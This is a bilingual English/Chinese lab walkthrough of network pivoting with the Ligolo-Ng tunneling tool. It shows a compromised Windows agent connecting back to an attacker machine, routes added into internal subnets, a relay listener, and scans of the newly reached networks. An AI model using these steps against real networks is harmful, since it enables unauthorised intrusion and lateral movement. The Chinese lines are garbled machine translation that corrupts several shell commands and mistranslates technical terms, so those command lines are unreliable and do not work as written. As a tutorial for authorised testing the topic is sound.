This comprehensive guide delves into the intricacies of Lateral Movement utilizing Ligolo-Ng, a tool developed by Nicolas Chatelain. The Ligolo-Ng tool facilitates the establishment of tunnels through reverse TCP/TLS connections using a tun interface, avoiding the necessity of SOCKS. This guide covers various aspects, from the tool’s unique features to practical applications such as single and double pivoting within a network.
这本综合指南深入探讨了利用 Nicolas Chatelain 开发的工具 Ligolo-Ng 横向运动的复杂性。Ligolo-Ng 工具有助于通过使用 tun 接口的反向 TCP/TLS 连接建立隧道,从而避免了 SOCKS 的必要性。本指南涵盖了各个方面,从工具的独特功能到实际应用,例如网络中的单枢轴和双枢轴。
Download Ligolo-Ng: 下载 Ligolo-NG:
Ligolo-Ng can be downloaded from the official repository: Ligolo-Ng Releases.
Ligolo-Ng 可以从官方存储库下载:Ligolo-Ng Releases。
Table of Contents: 目录:
- Introduction to Ligolo-Ng
Ligolo-NG简介 - Ligolo V/S Chisel Ligolo V/S 凿子
- Lab Setup 实验室设置
- Prerequisites 先决条件
- Setting up Ligolo-Ng 设置 Ligolo-Ng
- Single Pivoting 单次旋转
- Double Pivoting 双旋转
Ligolo-Ng Overview: Ligolo-NG 概述:
Ligolo-Ng is a lightweight and efficient tool designed to enable penetration testers to establish tunnels through reverse TCP/TLS connections, employing a tun interface. Noteworthy features include its GO-coded nature, VPN-like behavior, customizable proxy, and agents in GO. The tool supports multiple protocols, including ICMP, UDP, SYN stealth scans, OS detection, and DNS Resolution, offering connection speeds of up to 100 Mbits/sec. Ligolo-Ng minimizes maintenance time by avoiding tool residue on disk or in memory.
Ligolo-Ng 是一种轻量级且高效的工具,旨在使渗透测试人员能够通过反向 TCP/TLS 连接建立隧道,采用 tun 接口。值得注意的功能包括其 GO 编码性质、类似 VPN 的行为、可定制的代理和 GO 中的代理。该工具支持多种协议,包括 ICMP、UDP、SYN 隐身扫描、操作系统检测和 DNS 解析,提供高达 100 Mbits/秒的连接速度。Ligolo-Ng 通过避免刀具残留在磁盘或内存中,最大限度地减少了维护时间。
Ligolo V/S Chisel: Ligolo V/S 凿子:
- Ligolo-Ng outperforms Chisel in terms of speed and customization options.
Ligolo-Ng 在速度和定制选项方面优于 Chisel。 - Chisel operates on a server-client model, while Ligolo-Ng establishes individual connections with each target.
Chisel 以服务器-客户端模型运行,而 Ligolo-Ng 则与每个目标建立单独的连接。 - Ligolo-Ng reduces maintenance time by avoiding tool residue on disk or in memory.
Ligolo-Ng 通过避免刀具残留在磁盘或内存中来减少维护时间。 - Ligolo-Ng supports various protocols, including ICMP, UDP, SYN, in contrast to Chisel, which operates primarily on HTTP using a websocket.
Ligolo-Ng 支持各种协议,包括 ICMP、UDP、SYN,而 Chisel 主要使用 websocket 在 HTTP 上运行。
Lab Setup 实验室设置
Follow the step-by-step guide for lateral movement within a network, covering both single and double pivoting techniques.
按照网络内横向移动的分步指南进行操作,涵盖单枢轴和双枢轴技术。
Prerequisites 先决条件
Obtain the Ligolo ‘agent’ file for Windows 64-bit and the ‘proxy’ file for Linux 64-bit.
获取 Windows 64 位的 Ligolo“代理”文件和 Linux 64 位的“代理”文件。
Install the ‘agent’ file on the target machine and the ‘proxy’ file on the attacking machine (Kali Linux).
在目标计算机上安装“agent”文件,在攻击计算机上安装“proxy”文件(Kali Linux)。
Setting up Ligolo-Ng 设置 Ligolo-Ng
Step 1: Following the acquisition of both the agent and proxy files, the next step involves the setup of Ligolo-Ng. To ascertain the current status of Ligolo-Ng configuration, the ‘ifconfig’ command is employed. To initiate activation, execute the prescribed sequence of commands as follows:
第 1 步:在获取代理和代理文件后,下一步涉及设置 Ligolo-Ng。为了确定 Ligolo-Ng 配置的当前状态,使用了“ifconfig”命令。要启动激活,请执行规定的命令序列,如下所示:
ip tuntap 添加用户根模式 tun ligolo
IP 链接设置 Ligolo up
Verify Ligolo-Ng activation with: ‘ifconfig’ command
使用“ifconfig”命令验证 Ligolo-Ng 激活
Step2: Unzip the Ligolo proxy file:
Step2:解压缩 Ligolo 代理文件:
This proxy file facilitates the establishment of a connection through Ligolo, enabling us to execute subsequent pivoting actions. To explore the full range of options available in the proxy file, utilize the ‘help’ command
此代理文件有助于通过 Ligolo 建立连接,使我们能够执行后续的枢轴操作。要浏览代理文件中可用的全部选项,请使用“help”命令
Step 3: The options displayed in the preceding image are designed for incorporating various types of certificates with the proxy. The chosen approach involves utilizing the ‘-selfcert’ option, which operates on port 11601. Execute the provided command, as illustrated in the accompanying image below:
步骤 3:上图中显示的选项旨在将各种类型的证书与代理合并。所选择的方法涉及使用“-selfcert”选项,该选项在端口 11601 上运行。执行提供的命令,如下图所示:
Step 4: By executing the aforementioned command, Ligolo-Ng becomes operational on the attacking machine. Subsequently, to install the Ligolo agent on the target machine, unzip the ligolo agent file using the command:
第 4 步:通过执行上述命令,Ligolo-Ng 在攻击机器上开始运行。随后,要在目标计算机上安装 Ligolo 代理,请使用以下命令解压缩 ligolo 代理文件:
解压缩ligolo-ng_agent_0.5.1_windows_amd64.zip
To facilitate the transmission of this agent file to the target, establish a server with the command:
为了便于将此代理文件传输到目标,请使用以下命令建立服务器:
Step 5: In the context of lateral movement, a session has been successfully acquired through netcat. Utilizing the established netcat connection, the next step involves downloading the Ligolo agent file onto the target system. Referencing the image below, execute the provided sequence of commands:
第 5 步:在横向移动的上下文中,已通过 netcat 成功获取会话。利用已建立的 netcat 连接,下一步涉及将 Ligolo 代理文件下载到目标系统上。参考下图,执行提供的命令序列:
Step 6: Evidently, the agent file has been successfully downloaded. Given that the proxy file is presently operational on Kali, the subsequent action involves executing the agent file.
第 6 步:显然,代理文件已成功下载。鉴于代理文件当前在 Kali 上运行,后续操作涉及执行代理文件。
./agent.exe -connect 192.168.1.5:11601 -ignore-cert
Upon executing the specified command, a Ligolo session is initiated. Subsequently, employ the ‘session’ command, opting for ‘1’ to access the active session. Following the session establishment, execute the ‘ifconfig’ command as illustrated in the provided image.
执行指定命令后,将启动 Ligolo 会话。随后,使用“session”命令,选择“1”来访问活动会话。建立会话后,执行“ifconfig”命令,如提供的图像所示。
Notably, it discloses the existence of an internal network on the server, denoted by the IPv4 Address 192.168.148.130/24. This discovery prompts further exploration into creating a tunnel through this internal network in the subsequent steps.
值得注意的是,它公开了服务器上存在内部网络,用 IPv4 地址 192.168.148.130/24 表示。这一发现促使我们在后续步骤中进一步探索如何通过此内部网络创建隧道。
Single Pivoting 单次旋转
In the single pivoting scenario, the aim is to access Network B while staying within the boundaries of Network
在单一枢轴方案中,目标是访问网络 B,同时保持在网络边界内
Attempting a direct ping to Network B reveals, as illustrated in the image below, the impossibility due to different network configuration.
如下图所示,尝试直接 ping 网络 B 会发现,由于网络配置不同,这是不可能的。
To progress towards the single pivoting objective, a new terminal window will be opened. Subsequently, the internal IP will be added to the IP route, and the addition will be confirmed, as illustrated in the image below, utilizing the following commands:
为了朝着单一枢轴目标前进,将打开一个新的终端窗口。随后,内部 IP 将被添加到 IP 路由中,并且将使用以下命令确认添加,如下图所示:
IP 路由添加 192.168.148.0/24 dev ligolo
Return to the Ligolo proxy session window and initiate the tunneling process by entering the ‘start’ command, as demonstrated in the provided image
Upon establishing a tunnel into network B, we executed the netexec command to scan the network B subnet, unveiling an additional Windows 10 entity distinct from DC1, as depicted in the image.
在建立进入网络 B 的隧道后,我们执行了 netexec 命令来扫描网络 B 子网,并揭示了一个不同于 DC1 的其他 Windows 10 实体,如图所示。
Upon attempting to ping the IP now, successful ping responses will be observed, a contrast to the previous unsuccessful attempts. Additionally, a comprehensive nmap scan can be conducted, as illustrated in the image below.
现在尝试 ping IP 时,将观察到成功的 ping 响应,这与之前不成功的尝试形成鲜明对比。此外,还可以进行全面的 nmap 扫描,如下图所示。
Double Pivoting 双旋转
In the process of double pivoting, our objective is to gain access to Network C from Network A, utilizing Network B as an intermediary.
在双枢轴过程中,我们的目标是利用网络 B 作为中介,从网络 A 访问网络 C。
From the newly opened terminal window, utilize the Impacket tool to access the identified Windows 10 with the IP 192.168.148.132. Following this, execute the subsequent set of commands to download the Ligolo agent onto Windows 10
从新打开的终端窗口中,利用Impacket工具访问IP地址为192.168.148.132的已识别的Windows 10。在此之后,执行后续命令集以将 Ligolo 代理下载到 Windows 10 上
Subsequently, initiate the execution of the agent.exe. Upon completion, a session will be established, given that our Ligolo proxy file is already operational.
随后,启动agent.exe的执行。完成后,将建立一个会话,因为我们的 Ligolo 代理文件已经运行。
agent.exe -connect 192.168.1.5:11601 -ignore-cert
Examine Ligolo-ng proxy server, a new session, corresponding to Windows 10, will be present, as indicated in the accompanying image. Execute the ‘start’ command to initiate additional tunnelling.
检查 Ligolo-ng 代理服务器,将出现一个对应于 Windows 10 的新会话,如附图所示。执行“start”命令以启动其他隧道。
Execute the ‘session’ command to display the list of sessions. Navigate through the sessions using arrow keys, selecting the desired session for access. In this instance, the aim is to access the latest session, identified as session 2. Select this session and utilize the ‘ifconfig’ command to inspect the interfaces. This action reveals an additional network C interface with the address 192.168.159.130/24, mirroring the details depicted in the image below.
执行“session”命令以显示会话列表。使用箭头键浏览会话,选择要访问的所需会话。在本例中,目的是访问最新的会话,该会话被标识为会话 2。选择此会话并利用“ifconfig”命令检查接口。此操作将显示地址为 192.168.159.130/24 的附加网络 C 接口,反映了下图中描述的详细信息。
Upon identifying the new network, the initial step involves attempting a ping. However, the image below indicates an absence of connectivity between Kali and the network C.
确定新网络后,第一步涉及尝试 ping。但是,下图表明 Kali 和网络 C 之间没有连接。
Add the Network C Subnet in the IP route list with the following command.
使用以下命令在 IP 路由列表中添加网络 C 子网。
IP 路由添加 192.168.159.0/24 dev ligolo
With the modification of our IP route, the next step involves the addition of a listener to traverse the intra-network and retrieve the session. To incorporate the listener, utilize the following command:
随着 IP 路由的修改,下一步涉及添加一个侦听器来遍历网络内并检索会话。若要合并侦听器,请使用以下命令:
listener_add –addr 0.0.0.0:1234 –to 127.0.0.1:4444
The image above confirms the activation of the listener. To initiate tunneling, refer to available options using the help command. It becomes evident that halting the ongoing tunneling in session 1 is necessary before starting the process in session 2. This step-by-step approach facilitates the transfer of data to the listener, which subsequently retrieves the necessary information. This operational technique, known as double pivoting, involves stopping the initial tunneling in the first session using the ‘stop‘ command. In second session, execute the ‘start‘ command, following the steps illustrated in the image below.
上图确认了侦听器的激活。要启动隧道,请使用 help 命令参考可用选项。很明显,在会话 2 中开始该过程之前,必须停止会话 1 中正在进行的隧道。这种循序渐进的方法有助于将数据传输给侦听器,侦听器随后检索必要的信息。这种操作技术称为双枢轴,涉及使用“stop”命令在第一个会话中停止初始隧道。在第二个会话中,按照下图所示的步骤执行“start”命令。
Executing double pivoting was successful, and its verification occurred through the utilization of crackmapexec with the command:
执行双枢轴是成功的,它的验证是通过使用crackmapexec和以下命令进行的:
Discovering Metasploitable2 within the network followed. This led to the ability to conduct a ping and nmap scan, leveraging the acquired network access, as illustrated in the image below:
随后在网络中发现了 Metasploitable2。这导致了利用获取的网络访问进行 ping 和 nmap 扫描的能力,如下图所示: